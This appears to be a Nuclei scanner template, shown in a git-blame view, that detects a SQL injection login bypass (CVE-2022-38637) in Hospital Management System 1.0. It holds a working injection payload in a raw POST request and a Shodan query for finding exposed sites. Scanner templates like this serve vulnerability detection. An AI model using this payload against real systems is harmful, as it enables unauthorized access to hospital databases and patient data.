2022-09-14 12:55:38 +00:00
id : CVE-2022-38637
info :
2022-09-29 13:38:41 +00:00
name : Hospital Management System 1.0 - SQL Injection
2022-09-14 12:55:38 +00:00
author : arafatansari
2022-09-16 10:04:09 +00:00
severity : critical
2022-09-14 12:55:38 +00:00
description : |
2022-09-29 13:38:41 +00:00
Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/user-login.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2022-09-14 12:55:38 +00:00
reference :
2022-09-14 14:50:36 +00:00
- https://www.youtube.com/watch?v=m8nW0p69UHU
2022-09-15 12:24:00 +00:00
- https://owasp.org/www-community/attacks/SQL_Injection
2022-09-29 13:38:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-38637
2022-09-14 14:50:36 +00:00
classification :
2022-09-16 10:04:09 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-09-14 14:50:36 +00:00
cve-id : CVE-2022-38637
2022-09-16 10:04:09 +00:00
cwe-id : CWE-89
2022-09-14 12:55:38 +00:00
metadata :
shodan-query : http.html:"Hospital Management System"
2022-09-15 12:24:00 +00:00
verified : "true"
2022-09-14 14:50:36 +00:00
tags : cve,cve2022,hms,cms,sqli,auth-bypass
2022-09-14 12:55:38 +00:00
requests :
- raw :
- |
POST /hms/user-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=
2022-10-07 21:27:25 +00:00
host-redirects : true
2022-09-14 12:55:38 +00:00
max-redirects : 2
cookie-reuse : true
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-09-14 14:50:36 +00:00
- '<title>User | Dashboard</title>'
- 'Book My Appointment'
condition : and
2022-09-14 12:55:38 +00:00
- type : status
status :
- 200
2022-09-29 13:38:41 +00:00
# Enhanced by md on 2022/09/28